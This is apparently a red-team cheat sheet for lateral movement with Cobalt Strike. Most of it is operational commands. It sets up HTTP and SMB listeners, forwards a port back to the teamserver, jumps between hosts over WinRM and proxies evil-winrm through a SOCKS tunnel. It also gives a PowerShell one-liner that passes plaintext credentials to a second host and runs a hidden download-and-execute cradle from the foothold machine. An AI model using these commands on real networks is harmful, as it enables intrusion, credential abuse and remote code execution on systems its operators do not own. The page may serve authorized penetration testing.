Cobalt Strike
Lateral Movement
Initial Access
Use HTTP listener and scripted web delivery
General Lateral Movment
Set up an SMB listener and use that when moving with jump command
HTTP Shells
Set up a HTTP listener
HTTP host is the first target compromised (foothold machine)
HTTP Host (Stager) same as above
HTTP Port (C2) is 443
On foothold machine port forward to teamserver
rportfwd 443 <teamserver> 443
On foothold machine jump across
jump winrm <target> <HTTP listener above>
For further hops new listeners and portfwrds need to occur for any machine that cant talk to the foothold directly
Double Hop
When going over winrm and psexec you may encounter double hop issues same as usual.
Evil Winrm
Useful for when you need to pipe through a box that you cant get a beacon on. E.g. applocker
Have HTTP listener set up as above (for this named redir) with rportfwd
Set up scripted web delivery
Local Host = Foothold
Local port = 443
Listener = redir
Type = powershell x64
SOCKS proxy through foothold
socks 9051
Use evil-winrm (
proxychains evil-winrm -i <ip> -u Domain\username -p 'Password'
Pass creds and launch scripted web delivery on target2
$password = "Password" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\Username",$password); invoke-command -computername TARGET2 -Credential $cred -scriptblock {powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://FOOTHOLDIP:443/pivtest'))"}
Keep WINRM alive for session to stay alive (or migrate to another process)
Passing Powershell creds
General Tips
Make_token is only for cleartext passwords
Rubeus asktgt doesnt work so well with the /domain flag set
Last updated
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